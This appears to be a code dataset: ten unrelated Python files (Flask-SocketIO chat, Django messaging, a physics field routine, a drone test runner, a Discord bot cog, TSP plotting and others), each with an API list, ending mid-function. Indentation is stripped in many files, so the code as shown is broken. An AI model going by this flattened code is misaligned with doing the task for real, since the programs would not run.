'''server/app.py - main api app declaration'''
from flask import Flask, request, send_from_directory
from flask_cors import CORS
from flask_socketio import SocketIO, join_room
import os
'''Main wrapper for app creation'''
app = Flask(__name__, static_folder='./build')
socketio = SocketIO(app, cors_allowed_origins='*')
CORS(app)
# Active users list
activeUsers = []
##
# Sockets
##
@socketio.on('join')
def handleJoin(user):
activeUsers.append({'username': user["username"], 'sid': request.sid, 'emoji': user["emoji"]})
join_room(request.sid)
socketio.emit('update', activeUsers, broadcast=True)
@socketio.on('send')
def handleSend(data):
    socketio.emit('update', activeUsers, broadcast=True)
@socketio.on('upload')
def handleUpload(data):
    socketio.emit('download', data, room=data["receiver"])
@socketio.on('high')
def handleHigh(data):
socketio.emit('five', data, room=data["sender"])
@socketio.on('disconnect')
def handleDisc():
    # rebuild the list instead of popping while iterating (which skips elements)
    activeUsers[:] = [user for user in activeUsers if user["sid"] != request.sid]
socketio.emit('update', activeUsers, broadcast=True)
##
# API routes
##
##
# View route
##
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def index(path):
'''Return index.html for all non-api routes'''
#pylint: disable=unused-argument
return send_from_directory(app.static_folder, 'index.html')
##
# Run App
##
if __name__ == '__main__':
    socketio.run(app)
apis:
[
    "flask_cors.CORS",
    "flask.Flask",
    "flask_socketio.join_room",
    "flask_socketio.SocketIO",
    "flask.send_from_directory"
]
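A quick way to exercise these handlers without a browser is Flask-SocketIO's built-in test client. A minimal sketch, assuming the snippet above is importable as `app` (the module name is an assumption) and a Flask-SocketIO version that accepts the `broadcast` keyword used above; the `__main__` guard keeps the server from starting on import:

# Sketch: drive the 'join' handler through Flask-SocketIO's test client.
# `from app import ...` assumes the file above is importable as `app`.
from app import app, socketio

client = socketio.test_client(app)
client.emit('join', {'username': 'alice', 'emoji': ':wave:'})
# handleJoin should broadcast an 'update' event carrying the active-user list
received = client.get_received()
assert any(packet['name'] == 'update' for packet in received)
client.disconnect()
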
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django_messaging.models import DmUser
from django_messaging.views import index
@login_required
def send_pm(request,dm_user_id):
contact_username=DmUser.objects.get(id=dm_user_id).user.username
return render_to_response('messaging/send_pm.html',{'contact_id':dm_user_id,'contact_username':contact_username})
@login_required
def post_pm(request,dm_user_id):
profile=request.user.get_profile()
to_user=DmUser.objects.get(id=dm_user_id)
profile.send_message(to_user=to_user,message=request.GET['pm'])
return index(request)
@login_required
def read_pm(request,message_id=None,first=None):
if first:
message=request.user.get_profile().get_first_unreaded_message()
else:
message=request.user.get_profile().get_message(message_id)
if not message:
        return HttpResponse('Unable to read the message')
    # flag the message as read
    if not message.readed:
        message.readed = True
        # save the change
        message.save()
message.from_user_username=message.from_user.user.username
return render_to_response('messaging/read_pm.html',{'message':message})
@login_required
def read_first_pm(request):
return read_pm(request,first=True)
@login_required
def load_num_msgs(request):
num_messages=request.user.get_profile().count_unreaded_messages()
has_message=False
if num_messages>0:
has_message=True
return render_to_response('messaging/num_messages.html',{'has_message':has_message,'num_messages':num_messages,'media_url':settings.MEDIA_URL})
@login_required
def load_msgs_list(request):
profile=request.user.get_profile()
has_messages=False
messages_q=profile.get_messages().order_by('-date')
if len(list(messages_q))>0:
has_messages=True
messages=[]
for message in messages_q:
message.from_username=message.from_user.user.username
messages.append(message)
return render_to_response('messaging/messages_list.html',{'messages':messages,'has_messages':has_messages,'media_url':settings.MEDIA_URL})
@login_required
def delete_message(request,message_id):
profile=request.user.get_profile()
profile.delete_message(int(message_id))
return HttpResponseRedirect('/messaging/load_msgs_list/')
apis:
[
    "django.shortcuts.render_to_response",
    "django.http.HttpResponse",
    "django_messaging.views.index",
    "django_messaging.models.DmUser.objects.get",
    "django.http.HttpResponseRedirect"
]
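No URLconf is shown for these views. A hypothetical urls.py sketch in the same Django 1.x style as the code above (all route paths are assumptions; only `/messaging/load_msgs_list/` is implied by the redirect in delete_message):

# Hypothetical urls.py wiring for the views above (Django 1.x style, paths assumed)
from django.conf.urls import url
from django_messaging import views

urlpatterns = [
    url(r'^send_pm/(?P<dm_user_id>\d+)/$', views.send_pm),
    url(r'^post_pm/(?P<dm_user_id>\d+)/$', views.post_pm),
    url(r'^read_pm/(?P<message_id>\d+)/$', views.read_pm),
    url(r'^read_first_pm/$', views.read_first_pm),
    url(r'^load_num_msgs/$', views.load_num_msgs),
    url(r'^load_msgs_list/$', views.load_msgs_list),
    url(r'^delete_message/(?P<message_id>\d+)/$', views.delete_message),
]
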
# Generated by Django 3.2.8 on 2021-10-31 15:19
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('assesments', '0011_auto_20211031_1218'),
]
operations = [
migrations.RenameField(
model_name='taker',
old_name='api_user',
new_name='user',
),
]
apis:
[
    "django.db.migrations.RenameField"
]
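For context, a RenameField migration like this is what `makemigrations` emits after a field on the model is renamed. A hypothetical sketch of the corresponding model change (the migration does not record the field type, so the ForeignKey below is an assumption):

# Hypothetical model state in assesments/models.py after the rename.
# The field type is an assumption; only the name change is recorded above.
from django.conf import settings
from django.db import models

class Taker(models.Model):
    # previously: api_user = models.ForeignKey(...)
    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
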
""" obtain the static field from a set of charges and
dipoles at polarizable points.
"""
import numpy
from .tensor import T
from .mulmom import MulMom as M
def get_static_field_from_file(potential, filename):
    field = []
    with open(filename, 'r') as f:
        for i, line in enumerate(f):
            if i == 0:
                # first line is a header; skip it
                continue
            field.append(list(map(float, line.split())))
    return numpy.ravel(field)
def get_static_field(potential, **kwargs):
"""
"""
verbose = kwargs.get('verbose', False)
filename = kwargs.pop('filename', None)
F_static = numpy.zeros(3 * potential.npols)
if filename is not None:
if verbose:
print("Loading static field from file '{0}'".format(filename))
F_static = get_static_field_from_file(potential, filename)
else:
try:
from .field import static_field
ex = numpy.array([potential.exclusion_list[k] for k in range(len(potential.exclusion_list))])
q = numpy.zeros(potential.nsites)
d = numpy.zeros((potential.nsites,3))
multipoles = potential.multipoles
            if 0 in multipoles.keys():
                q = numpy.array([m[0] for m in multipoles[0]])
            if 1 in multipoles.keys():
                d = numpy.array([m for m in multipoles[1]])
F_static = static_field(potential.npols, potential.coordinates, potential.has_alpha, ex, q, d)
except ModuleNotFoundError:
if verbose:
print("INFO: static field calculated using (slow) python version.")
offset = 0
for isite in range(potential.nsites):
itensor = potential.has_alpha[isite]
is_polarizable_point = (itensor > -1)
Ri = potential.coordinates[isite]
if is_polarizable_point:
iexclusion_list = potential.exclusion_list[isite]
for jsite in range(potential.nsites):
if jsite == isite:
continue
if jsite in iexclusion_list:
continue
jtensor = potential.has_alpha[jsite]
js_polarizable_point = (jtensor > -1)
Rj = potential.coordinates[jsite]
dRij = Rj - Ri
T1 = T(1, dRij)
try:
M0 = M(*potential.multipoles[0][jsite])
except KeyError:
F0 = numpy.zeros(3)
else:
F0 = numpy.array(M0 * T1).ravel()
finally:
F_static[offset:offset + 3] -= F0
T2 = T(2, dRij)
try:
M1 = M(*potential.multipoles[1][jsite])
except KeyError:
F1 = numpy.zeros(3)
else:
F1 = numpy.array(M1 * T2)
finally:
F_static[offset:offset + 3] += F1
T3 = T(3, dRij)
try:
M2 = M(*potential.multipoles[2][jsite])
except KeyError:
F2 = numpy.zeros(3)
else:
F2 = numpy.array(M2 * T3)
finally:
F_static[offset:offset + 3] += F2
offset += 3
return F_static
apis:
[
    "numpy.array",
    "numpy.zeros",
    "numpy.ravel"
]
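get_static_field_from_file skips the first line and parses whitespace-separated floats from the rest, so the expected layout is a one-line header followed by one row of field components per line. A standalone sketch of writing and re-reading such a file (the filename and header content are assumptions; the parsing mirrors the function above):

# Sketch: the field-file format consumed by get_static_field_from_file.
import numpy

rows = [(0.0, 0.1, -0.2), (0.3, 0.0, 0.5)]  # one (Fx, Fy, Fz) row per polarizable point
with open('static_field.dat', 'w') as f:
    f.write('2\n')  # header line; its content is ignored by the reader
    for row in rows:
        f.write(' '.join(str(x) for x in row) + '\n')

# re-read the file the same way the function above does
with open('static_field.dat') as f:
    field = [list(map(float, line.split())) for i, line in enumerate(f) if i > 0]
print(numpy.ravel(field))  # -> [ 0.   0.1 -0.2  0.3  0.   0.5]
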
import typing
from typing import Dict, Optional
from monitoring.monitorlib.clients.scd_automated_testing import QueryError
from monitoring.monitorlib.scd_automated_testing.scd_injection_api import (
InjectFlightResponse,
)
from monitoring.uss_qualifier.common_data_definitions import Severity
from monitoring.uss_qualifier.scd.configuration import SCDQualifierTestConfiguration
from monitoring.uss_qualifier.scd.data_interfaces import (
AutomatedTest,
TestStep,
FlightInjectionAttempt,
)
from monitoring.uss_qualifier.scd.executor.errors import TestRunnerError
from monitoring.uss_qualifier.scd.executor.report_recorder import ReportRecorder
from monitoring.uss_qualifier.scd.executor.target import TestTarget
from monitoring.uss_qualifier.scd.executor.test_steps import (
inject_flight,
delete_flight,
)
from monitoring.uss_qualifier.scd.reports import (
Report,
Issue,
AutomatedTestContext,
TestStepReference,
TestPhase,
)
# TODO: Replace print with logging
class TestRunner:
"""A class to run automated test steps for a specific combination of targets per uss role"""
def __init__(
self,
context: AutomatedTestContext,
automated_test: AutomatedTest,
targets: Dict[str, TestTarget],
dss_target: Optional[TestTarget],
report: Report,
):
self.context = context
self.automated_test = automated_test
self.targets = targets
self.dss_target = dss_target
self.report_recorder = ReportRecorder(report, self.context)
def get_scd_configuration(self) -> SCDQualifierTestConfiguration:
return SCDQualifierTestConfiguration(
injection_targets=list(map(lambda t: t.config, self.targets.values()))
)
def run_automated_test(self):
for i, step in enumerate(self.automated_test.steps):
print("[SCD] Running step {}: {}".format(i, step.name))
self.execute_step(step, i)
def teardown(self):
"""Delete resources created by this test runner."""
print("[SCD] Teardown {}".format(self.automated_test.name))
cleanup_test_step = 0
for role, target in self.targets.items():
            flight_names = target.managed_flights()
            print(
                "[SCD] - Deleting {} flights for target {}.".format(
                    len(flight_names), target.name
                )
            )
            for flight_name in flight_names:
step_ref = TestStepReference(
name="Clean up flight {} in {}".format(flight_name, target.name),
index=cleanup_test_step,
phase=TestPhase.Cleanup,
)
try:
resp, query = target.delete_flight(flight_name)
self.report_recorder.capture_interaction(
step_ref, query, "Remove flight during test cleanup"
)
except QueryError as e:
interaction_id = self.report_recorder.capture_interaction(
step_ref, e.query, "Remove flight during test cleanup"
)
self.report_recorder.capture_deletion_unknown_issue(
interaction_id=interaction_id,
summary="Deletion request for flight {} was unsuccessful".format(
flight_name
),
details="Deletion attempt failed with status {}.".format(
e.query.status_code
),
flight_name=flight_name,
target_name=target.name,
uss_role=role,
)
print(
"[SCD] Error: Unable to delete flight {} during teardown".format(
flight_name
)
)
cleanup_test_step = cleanup_test_step + 1
def execute_step(self, step: TestStep, step_index: int):
target = self.get_target(step)
if target is None:
self.print_targets_state()
raise RuntimeError(
"[SCD] Error: Unable to identify the target managing flight {}".format(
step.inject_flight.name
if "inject_flight" in step
else step.delete_flight.flight_name
)
)
step_ref = TestStepReference(
name=step.name, index=step_index, phase=TestPhase.Test
)
if "inject_flight" in step:
inject_flight.execute(self, step, step_ref, target)
elif "delete_flight" in step:
delete_flight.execute(self, step, step_ref, target)
else:
raise RuntimeError(
"[SCD] Error: Unable to identify the action to execute for step {}".format(
step.name
)
)
print("[SCD] Step {} COMPLETED".format(step.name))
def get_managing_target(self, flight_name: str) -> typing.Optional[TestTarget]:
"""Returns the managing target which created a flight"""
for role, target in self.targets.items():
if target.is_managing_flight(flight_name):
return target
return None
def get_target(self, step: TestStep) -> typing.Optional[TestTarget]:
"""Returns the target which should be called in the TestStep"""
if "inject_flight" in step:
return self.targets[step.inject_flight.injection_target.uss_role]
elif "delete_flight" in step:
return self.get_managing_target(step.delete_flight.flight_name)
else:
raise NotImplementedError(
"Unsupported step. A Test Step shall contain either a inject_flight or a delete_flight object."
)
def get_target_role(self, target_name):
results = list(filter(lambda x: x[1].name == target_name, self.targets.items()))
return results[0] if len(results) > 0 else None
def evaluate_inject_flight_response(
self,
interaction_id: str,
target: TestTarget,
attempt: FlightInjectionAttempt,
resp: InjectFlightResponse,
) -> typing.Optional[Issue]:
if resp.result not in attempt.known_responses.acceptable_results:
print(
"[SCD] Result: ERROR. Received {}, expected one of {}. Reason: {}".format(
resp.result,
attempt.known_responses.acceptable_results,
resp.get("notes", None),
)
)
known_issue = attempt.known_responses.incorrect_result_details.get(
resp.result, None
)
if known_issue:
issue = self.report_recorder.capture_injection_issue(
interaction_id=interaction_id,
target_name=target.name,
attempt=attempt,
known_issue=known_issue,
)
if known_issue.severity != Severity.Low:
raise TestRunnerError(
"Failed attempt to inject flight {}: {}".format(
attempt.name, known_issue.summary
),
issue,
)
else:
issue = self.report_recorder.capture_injection_unknown_issue(
interaction_id=interaction_id,
summary="Injection request was unsuccessful",
details="Injection attempt failed with unknown response {}".format(
resp.result
),
target_name=target.name,
attempt=attempt,
)
raise TestRunnerError(
"Unsuccessful attempt to inject flight {}".format(attempt.name),
issue,
)
return None
def print_targets_state(self):
print("[SCD] Targets States:")
for name, target in self.targets.items():
print(f"[SCD] - {name}: {target.created_flight_ids}")
apis:
[
    "monitoring.uss_qualifier.scd.executor.report_recorder.ReportRecorder",
    "monitoring.uss_qualifier.scd.executor.test_steps.inject_flight.execute",
    "monitoring.uss_qualifier.scd.executor.test_steps.delete_flight.execute",
    "monitoring.uss_qualifier.scd.reports.TestStepReference"
]
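execute_step and get_target dispatch on membership tests such as "inject_flight" in step, which works because TestStep behaves like a dictionary of optional sub-objects. A toy sketch of that dispatch pattern using plain dicts in place of the real data_interfaces types (the stub payloads below are assumptions for illustration):

# Toy illustration of the membership-based dispatch used in execute_step/get_target.
def dispatch(step: dict) -> str:
    if "inject_flight" in step:
        return "inject for role " + step["inject_flight"]["injection_target"]["uss_role"]
    elif "delete_flight" in step:
        return "delete flight " + step["delete_flight"]["flight_name"]
    raise NotImplementedError(
        "A Test Step shall contain either an inject_flight or a delete_flight object."
    )

print(dispatch({"inject_flight": {"injection_target": {"uss_role": "uss1"}}}))
print(dispatch({"delete_flight": {"flight_name": "flight-1"}}))
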
import json
import numpy as np
import glob
import argparse
import f0dl_bernox
def compute_f0_shift_curve(expt_dict, filter_key, filter_value, f0_min=80.0, f0_max=1e3):
    '''Compute predicted-f0-shift statistics for trials where `filter_key` equals `filter_value`.'''
# Identify trials where filter_key = filter_value and stimulus is in f0 range
indexes = expt_dict[filter_key] == filter_value
indexes = np.logical_and(indexes, np.logical_and(expt_dict['f0'] >= f0_min, expt_dict['f0'] <= f0_max))
# Compute f0 shifts
f0_shift = expt_dict['f0_shift'][indexes]
f0_pred_shift = (expt_dict['f0_pred'][indexes] - expt_dict['f0'][indexes]) / expt_dict['f0'][indexes]
# For each unique f0 shift, compute the mean, median, stddev predicted f0 shift
f0_shift_unique = np.unique(f0_shift)
f0_pred_shift_mean = np.zeros_like(f0_shift_unique)
f0_pred_shift_median = np.zeros_like(f0_shift_unique)
f0_pred_shift_stddev = np.zeros_like(f0_shift_unique)
for idx, f0_shift_value in enumerate(f0_shift_unique):
current_value_indexes = f0_shift == f0_shift_value
f0_pred_shift_mean[idx] = np.mean(f0_pred_shift[current_value_indexes])
f0_pred_shift_median[idx] = np.median(f0_pred_shift[current_value_indexes])
f0_pred_shift_stddev[idx] = np.std(f0_pred_shift[current_value_indexes])
# Return results in dictionary (units converted to percent)
sub_results_dict = {
'f0_shift': 100.0 * f0_shift_unique,
'f0_pred_shift_mean': 100.0 * f0_pred_shift_mean,
'f0_pred_shift_median': 100.0 * f0_pred_shift_median,
'f0_pred_shift_stddev': 100.0 * f0_pred_shift_stddev,
}
return sub_results_dict
def run_f0experiment_freq_shifted(json_fn, filter_key='spectral_envelope_centered_harmonic',
f0_label_pred_key='f0_label:labels_pred',
f0_label_true_key='f0_label:labels_true',
f0_label_prob_key='f0_label:probs_out',
kwargs_f0_prior={},
f0_min=None,
f0_max=None):
    '''Run the frequency-shifted complexes analysis on a JSON file of model predictions.'''
# Load JSON file of model predictions into `expt_dict`
metadata_key_list = [
'f0',
'f0_shift',
'spectral_envelope_centered_harmonic',
'spectral_envelope_bandwidth_in_harmonics',
]
expt_dict = f0dl_bernox.load_f0_expt_dict_from_json(json_fn,
f0_label_true_key=f0_label_true_key,
f0_label_pred_key=f0_label_pred_key,
f0_label_prob_key=f0_label_prob_key,
metadata_key_list=metadata_key_list)
expt_dict = f0dl_bernox.add_f0_estimates_to_expt_dict(expt_dict,
f0_label_true_key=f0_label_true_key,
f0_label_pred_key=f0_label_pred_key,
kwargs_f0_prior=kwargs_f0_prior)
# Initialize dictionary to hold psychophysical results
if f0_min is None: f0_min = np.min(expt_dict['f0'])
if f0_max is None: f0_max = np.max(expt_dict['f0'])
results_dict = {filter_key:{}, 'f0_min':f0_min, 'f0_max':f0_max}
for filter_value in np.unique(expt_dict[filter_key]):
results_dict[filter_key][int(filter_value)] = compute_f0_shift_curve(expt_dict,
filter_key,
filter_value,
f0_min=f0_min,
f0_max=f0_max)
# Return dictionary of psychophysical experiment results
return results_dict
def main(json_eval_fn, json_results_dict_fn=None, save_results_to_file=False,
filter_key='spectral_envelope_centered_harmonic',
f0_label_pred_key='f0_label:labels_pred',
f0_label_true_key='f0_label:labels_true',
f0_label_prob_key='f0_label:probs_out',
kwargs_f0_prior={},
f0_min=None,
f0_max=None):
    '''Run the freq-shifted complexes experiment and optionally save the results to file.'''
# Run the Moore and Moore (2003) freq-shifted complexes experiment; results stored in results_dict
results_dict = run_f0experiment_freq_shifted(json_eval_fn,
filter_key=filter_key,
f0_label_pred_key=f0_label_pred_key,
f0_label_true_key=f0_label_true_key,
f0_label_prob_key=f0_label_prob_key,
kwargs_f0_prior=kwargs_f0_prior,
f0_min=f0_min,
f0_max=f0_max)
results_dict['json_eval_fn'] = json_eval_fn
results_dict['kwargs_f0_prior'] = kwargs_f0_prior
# If specified, save results_dict to file
if save_results_to_file:
# Check filename for results_dict
if json_results_dict_fn is None:
json_results_dict_fn = json_eval_fn.replace('.json', '_results_dict.json')
assert not json_results_dict_fn == json_eval_fn, "json_results_dict_fn must not overwrite json_eval_fn"
# Define helper class to JSON serialize the results_dict
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray): return obj.tolist()
if isinstance(obj, np.int64): return int(obj)
return json.JSONEncoder.default(self, obj)
# Write results_dict to json_results_dict_fn
with open(json_results_dict_fn, 'w') as f: json.dump(results_dict, f, cls=NumpyEncoder)
print('[END] wrote results_dict to {}'.format(json_results_dict_fn))
return results_dict
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="run Moore and Moore (2003) freq-shifted complexes experiment")
parser.add_argument('-r', '--regex_json_eval_fn', type=str, default=None,
help='regex that globs list of json_eval_fn to process')
parser.add_argument('-j', '--job_idx', type=int, default=None,
help='job index used to select json_eval_fn from list')
parser.add_argument('-p', '--prior_range_in_octaves', type=float, default=0,
help='sets octave_range in `kwargs_f0_prior`: [#, #]')
parsed_args_dict = vars(parser.parse_args())
assert parsed_args_dict['regex_json_eval_fn'] is not None, "regex_json_eval_fn is a required argument"
assert parsed_args_dict['job_idx'] is not None, "job_idx is a required argument"
list_json_eval_fn = sorted(glob.glob(parsed_args_dict['regex_json_eval_fn']))
json_eval_fn = list_json_eval_fn[parsed_args_dict['job_idx']]
print('Processing file {} of {}'.format(parsed_args_dict['job_idx'], len(list_json_eval_fn)))
print('Processing file: {}'.format(json_eval_fn))
if parsed_args_dict['prior_range_in_octaves'] > 0:
kwargs_f0_prior = {
'f0_label_prob_key': 'f0_label:probs_out',
'f0_prior_ref_key': 'f0',
'octave_range': [
-parsed_args_dict['prior_range_in_octaves'],
parsed_args_dict['prior_range_in_octaves']
],
}
else:
kwargs_f0_prior = {}
main(json_eval_fn, save_results_to_file=True, kwargs_f0_prior=kwargs_f0_prior)
apis:
[
    "json.dump",
    "numpy.zeros_like",
    "f0dl_bernox.add_f0_estimates_to_expt_dict",
    "argparse.ArgumentParser",
    "numpy.logical_and",
    "numpy.median",
    "numpy.std",
    "numpy.min",
    "numpy.mean",
    "f0dl_bernox.load_f0_expt_dict_from_json",
    "numpy.max",
    "glob.glob",
    "json.JSONEncoder.default",
    "numpy.unique"
]
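The NumpyEncoder defined inside main() is a standard pattern for JSON-serializing numpy scalars and arrays; extracted here as a standalone sketch:

# Standalone sketch of the NumpyEncoder pattern used in main() above.
import json
import numpy as np

class NumpyEncoder(json.JSONEncoder):
    def default(self, obj):
        if isinstance(obj, np.ndarray): return obj.tolist()
        if isinstance(obj, np.int64): return int(obj)
        return json.JSONEncoder.default(self, obj)

payload = {'values': np.arange(3), 'count': np.int64(3)}
print(json.dumps(payload, cls=NumpyEncoder))  # {"values": [0, 1, 2], "count": 3}
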
import FWCore.ParameterSet.Config as cms
from RecoLocalMuon.GEMRecHit.gemRecHits_cfi import *
from RecoLocalMuon.GEMSegment.gemSegments_cfi import *
gemLocalRecoTask = cms.Task(gemRecHits,gemSegments)
gemLocalReco = cms.Sequence(gemLocalRecoTask)
apis:
[
    "FWCore.ParameterSet.Config.Sequence",
    "FWCore.ParameterSet.Config.Task"
]
from discord.ext import commands
from db_utils.handle_conn import HandleConn
from tle.cogs.util import codeforces_api as cf
class Roles(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.ranks = [
'Expert', 'Candidate Master', 'Master', 'International Master',
'Grandmaster', 'International Grandmaster', 'Legendary Grandmaster'
]
async def FetchRoles(self, ctx):
converter = commands.RoleConverter()
rank2role = {}
for r in self.ranks:
rank2role[r.lower()] = await converter.convert(ctx, r)
return rank2role
@commands.command(brief='update roles (admin-only)')
@commands.has_role('Admin')
async def updateroles(self, ctx):
"""update roles"""
try:
rank2role = await self.FetchRoles(ctx)
        except Exception:
await ctx.send('error fetching roles!')
return
try:
conn = HandleConn('handles.db')
res = conn.getallhandles()
inforesp = await cf.user.info(handles=[t[1] for t in res])
await ctx.send('caching handles...')
try:
for i, r in enumerate(inforesp):
conn.cachehandle(res[i][1], r['rating'], r['titlePhoto'])
except Exception as e:
print(e)
conn.close()
        except Exception:
conn.close()
await ctx.send('error getting data from cf')
return
await ctx.send('updating roles...')
try:
converter = commands.MemberConverter()
for i, r in enumerate(inforesp):
try:
member = await converter.convert(ctx, res[i][0])
rank = r['rank'].lower()
rm_list = []
add = True
for role in member.roles:
name = role.name.lower()
if name == rank: add = False
elif name in rank2role: rm_list.append(role)
if rm_list:
await member.remove_roles(*rm_list)
if add:
await member.add_roles(rank2role[rank])
except Exception as e:
print(e)
msg = 'update roles completed'
except Exception as e:
msg = 'updateroles error!'
print(e)
await ctx.send(msg)
def setup(bot):
bot.add_cog(Roles(bot))
"""
{'expert': '555971731232391179', 'candidate master': '555972443693383700', 'master': '555972496558653441', 'international master': '555973490407243786', 'grandmaster': '555972556088279040', 'international grandmaster': '555972612245946380', 'legendary grandmaster': '555972689869668382'}
"""
apis:
[
    "discord.ext.commands.command",
    "discord.ext.commands.RoleConverter",
    "db_utils.handle_conn.HandleConn",
    "discord.ext.commands.MemberConverter",
    "tle.cogs.util.codeforces_api.user.info",
    "discord.ext.commands.has_role"
]
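The setup(bot) hook indicates this cog is loaded as a discord.py extension; a minimal launcher sketch in discord.py 1.x style (the extension path, command prefix, and token variable are assumptions):

# Hypothetical launcher for the Roles cog above (discord.py 1.x style).
import os
from discord.ext import commands

bot = commands.Bot(command_prefix=';')
bot.load_extension('tle.cogs.roles')  # module path is an assumption
bot.run(os.environ['BOT_TOKEN'])  # token sourced from the environment
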
from django.contrib import admin
from apps.employees.models import Employee, Position, Schedule
admin.site.register(Employee)
admin.site.register(Position)
admin.site.register(Schedule)
apis:
[
    "django.contrib.admin.site.register"
]
"""
Base Class for Optimization Algorithms
Implements problem instance loading, heuristic initialization function, and data plotting functions.
"""
# ----------------------------------------------------------
import tsplib95 as tsp
from numpy.random import default_rng
# plotting
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.lines as mlines
matplotlib.use("pgf")
matplotlib.rcParams.update(
{
"pgf.texsystem": "pdflatex",
"font.family": "serif",
"text.usetex": True,
"pgf.rcfonts": False,
}
)
from pathlib import Path
from candidate_solution import CandidateSolution, weight
# from agent import distance
# ------------------------------------------------------------------------------
class OptimisationBase:
"""
Abstract base class for Optimisation Algorithms
"""
# Initialization and built-in function overriding
def __init__(self, parameters, output_path):
self.output_path = output_path
self.size = parameters["size"]
self.max_iterations = parameters["max_iterations"]
self.heuristic_init = parameters["heuristic_init"]
self.load_problem(parameters["problem_filename"])
self.iteration = 0
self.memory = []
self.quality_by_iteration = []
self.quality_overall = []
self.run_stats = {**parameters}
def __repr__(self):
return "<Optimization size:%s limit:%s problem:%s>" % (
self.size,
self.max_iterations,
self.problem.name,
)
def __str__(self):
return "Optimization: population size %s, limit %s, problem %s" % (
self.size,
self.max_iterations,
self.problem.name,
)
def get_heuristic_tour(self):
def d(a, b):
return self.problem.get_weight(a, b)
rng = default_rng()
nodes = list(self.problem.get_nodes())
first = rng.choice(nodes)
nodes.remove(first)
tour = []
tour.append(first)
while nodes:
            next_node = min(((node, d(tour[-1], node)) for node in nodes), key=lambda t: t[1])
tour.append(next_node[0])
nodes.remove(next_node[0])
return tour
def load_problem(self, problem_filename):
"""
Load problem from file, as well as opt.tour if available
"""
self.problem = tsp.load(problem_filename)
CandidateSolution.set_problem(self.problem)
self.optimum = None
opt_tour = problem_filename[:-4] + ".opt.tour"
try:
self.optimum = CandidateSolution(tsp.load(opt_tour).tours[0])
except FileNotFoundError as err:
print("FileNotFoundError: {0}".format(err))
else:
pass
# Output Methods -----------------------------------------------------------
def print_best(self):
# make figure, axes
plt.style.use("ggplot")
plt.tight_layout()
gs_kw = dict(width_ratios=[3, 2], height_ratios=[1])
fig, (ax1, ax2) = plt.subplots(
figsize=(9, 4.5), ncols=2, nrows=1, gridspec_kw=gs_kw
)
ax1.set(title="Optimisation Result", xlabel="x", ylabel="y")
# ax1.set_aspect('equal', 'box')
ax1.set_aspect("equal")
ax2.set(title="Quality development", xlabel="iteration", ylabel="tour length")
# AX1 Best Solution vs. Optimal Solution
# Nodes
xs, ys = zip(*self.problem.node_coords.values())
labels = self.problem.node_coords.keys()
ax1.scatter(xs, ys, marker="o", color="dimgrey", zorder=10)
for label, x, y in zip(labels, xs, ys):
ax1.annotate(label, xy=(x, y), zorder=20)
# plots best tour in self.memory
best_tour = min(self.memory, key=lambda p: p.weight).tour
xt = []
yt = []
for p in best_tour:
coords = self.problem.node_coords[p]
xt.append(coords[0])
yt.append(coords[1])
xt.append(xt[0])
yt.append(yt[0])
ax1.plot(xt, yt, alpha=1.0, color="darkred", linestyle="dashed", zorder=2)
# plots optimum tour if given
if self.optimum is not None:
opt_tour = self.optimum.tour
xt = []
yt = []
for p in opt_tour:
coords = self.problem.node_coords[p]
xt.append(coords[0])
yt.append(coords[1])
xt.append(xt[0])
yt.append(yt[0])
ax1.plot(xt, yt, alpha=0.4, color="yellowgreen", linewidth=5, zorder=1)
# Labels
redline = mlines.Line2D(
[], [], color="darkred", linestyle="dashed", label="Overall Best Tour"
)
yellowline = mlines.Line2D(
[], [], color="yellowgreen", linewidth="5", label="Known Optimal Tour"
)
grey_dot = mlines.Line2D(
[], [], color="dimgrey", marker="o", linestyle="", label="Node"
)
ax1.legend(
handles=[redline, yellowline, grey_dot],
loc="upper center",
bbox_to_anchor=(0.5, -0.1),
shadow=True,
ncol=3,
)
# AX2 - Stats
ymax = max(max(self.quality_overall), max(self.quality_by_iteration))
if self.optimum is not None:
ymin = self.optimum.weight
else:
ymin = min(min(self.quality_overall), min(self.quality_by_iteration))
margin = (ymax - ymin) * 0.5
ax2.set(
xlim=(-0.5, self.max_iterations + 0.5), ylim=(ymin - margin, ymax + margin)
)
iterations = list(range(0, self.iteration + 1))
ax2.plot(iterations, self.quality_by_iteration, marker="", color="red")
ax2.plot(iterations, self.quality_overall, marker="", color="grey")
if self.optimum is not None:
ax2.axhline(y=self.optimum.weight, color="yellowgreen", linewidth=2)
# Legend
red_dot = mlines.Line2D([], [], color="red", marker="", label="Iteration best")
grey_dot = mlines.Line2D([], [], color="grey", marker="", label="Overall best")
ax2_handles = [red_dot, grey_dot]
if self.optimum is not None:
baseline = mlines.Line2D(
[], [], color="yellowgreen", linewidth=2, label="Known Optimum"
)
ax2_handles.append(baseline)
ax2.legend(
handles=ax2_handles,
loc="upper center",
bbox_to_anchor=(0.5, -0.1),
shadow=True,
ncol=2,
)
fig.tight_layout()
# Saving to specific directory and file
out_path = "output/{}".format(self.output_path)
Path(out_path).mkdir(parents=True, exist_ok=True)
plt.savefig("{}/best.png".format(out_path), format="png")
plt.savefig("{}/best.pgf".format(out_path), format="pgf")
plt.close(fig)
def print_map_only(self):
# make figure, axes
plt.style.use("ggplot")
plt.tight_layout()
gs_kw = dict(width_ratios=[1], height_ratios=[1])
fig, (ax1) = plt.subplots(
figsize=(4.4, 5.9), ncols=1, nrows=1, gridspec_kw=gs_kw
)
titel = f"eil51 - Iteration {self.iteration}"
ax1.set(title=titel, xlabel="x", ylabel="y")
ax1.set_aspect("equal")
# AX1 Best Solution vs. Optimal Solution
# Nodes
xs, ys = zip(*self.problem.node_coords.values())
# labels = self.problem.node_coords.keys()
ax1.scatter(xs, ys, marker="o", color="dimgrey", zorder=10)
# for label, x, y in zip(labels, xs, ys):
# ax1.annotate(label, xy=(x, y), zorder=20)
# plots best tour in self.memory
best_tour = min(self.memory, key=lambda p: p.weight).tour
xt = []
yt = []
for p in best_tour:
coords = self.problem.node_coords[p]
xt.append(coords[0])
yt.append(coords[1])
xt.append(xt[0])
yt.append(yt[0])
ax1.plot(xt, yt, alpha=1.0, color="C1", linestyle="dashed", zorder=2)
# plots optimum tour if given
if self.optimum is not None:
